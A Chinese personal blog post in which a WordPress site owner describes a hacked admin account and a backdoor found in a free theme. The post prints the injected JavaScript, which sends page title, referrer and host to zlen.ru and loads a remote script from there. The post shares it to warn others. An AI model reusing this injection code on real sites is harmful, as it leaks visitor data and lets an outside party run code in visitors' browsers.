2018年04月6日网站服务器迁移完成……

【技巧】博客内莫名加载JS 的清除技巧

wordpress 苏 demo 1791℃ 0评论

前段时间,博客没有及时更新,可以这么说,这套博客系统是 自豪的采用了 wordpress 进行搭建。

使用这样的系统很常见的一个问题就是系统可能很多漏洞会被很多人知晓。

前段时间,博客后台就被攻破 了。。。这点博主用的密码太简单了,很容易就被猜解了。。。

于是博主重新登录到系统后台 重置了密码,并清除了一下乱起八糟的用户。。。

并对博客进行升级。。。

原本博主以为这样就结束了。。。

却没发现。。

原来博客的模版里早就埋下了一些后门。。。

PS:特别提醒个人建站的朋友,一定不要图免费,就使用网上随意可找到的一些模版之类的文件,小心有后门哦。

以下为示例:

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://zlen.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

博客升级以后 特别慢了。。。访问一个页面总是要6s + 才能打开。。

后来发现有个zlen.ru的域名请求,找了很久终于找到。。

这个伪装的挺深的。。

怀疑此处代码用于统计使用此模版的站点信息;

目前已经清除掉了。。播放打开速度 终于恢复。。。

 

 

打赏

转载请注明:苏demo的别样人生 » 【技巧】博客内莫名加载JS 的清除技巧

   如果本篇文章对您有帮助,欢迎向博主进行赞助,赞助时请写上您的用户名。
支付宝直接捐助帐号oracle_lee@qq.com 感谢支持!
喜欢 (0)or分享 (0)
发表我的评论
取消评论
表情
(1)个小伙伴在吐槽